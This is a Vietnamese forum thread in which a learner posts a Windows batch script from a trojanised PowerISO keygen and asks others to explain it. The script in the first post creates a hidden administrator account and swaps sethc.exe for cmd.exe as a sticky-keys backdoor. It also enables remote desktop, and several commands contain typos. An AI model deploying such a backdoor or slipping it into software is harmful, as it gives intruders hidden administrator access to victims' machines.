Hỏi về cấu trúc của 1 con trojan!

[thiendia9000]

Chào mọi người!

Hiện tại mình đang tập tành tìm hiểu về virut có ai hiểu đoạn code này giải thích giùm mình với ạ

Đây là 1 đoạn code mình tìm được là trojan netcat khi tấn xâm nhập máy tính của victim bằng cách gửi 1 phần mềm PowerISO qua mail trong đó có 2 keygne nhưng 1 key thực đã ẩn đi và key giả là trojan

khi kích hoạt thì key thật hoạt động đồng thời trojan cũng hoạt động


@echo off

start PowerISO-key.exe

if exist sethc.exe.suriv goto else goto hack

:hack

TAKEOWN /F C:\windows\Sytem32\sethc.exe

TAKEOWN /F C:\windows\Sytem32\cmd.exe

reg add "HKEY_LOCAL_MACHINE\sYSTEM\Currentcontrolset\Contr ol\Terminal Sever" /v fDenyTSconnections /t REG_DWORD /d "0" /f

net user su forever /add

net localgroup administrators su /add

cd /d C:\Windows\System32

icacls sethc.exe /grant administrators:F

icacls cmd.exe /grant administrators:F

rename sethc.exe sethc.exe.suriv

icals sethc.exe.suriv /dent adminitrators:F

copy cmd.exe sethc.exe /y

reg add "HKEY_LOCAL_MACHINE\Software\Micosoft\WindowsNT\cu rrentVerison\Winlogon\SpecialAccounts\userList" /v SU /t REG_DWORD /d "0" /f

:exit

Mình cứ thắc mắc k biết đây có phải là 1 con trojan thực sự không!

Ai biết được đoạn code này chỉ mình với!

Thank mọi người nhiều

 

[Tennyson]

Cái này em bó tay. Lót gạch ngóng reply của các bạn để học hỏi kakaka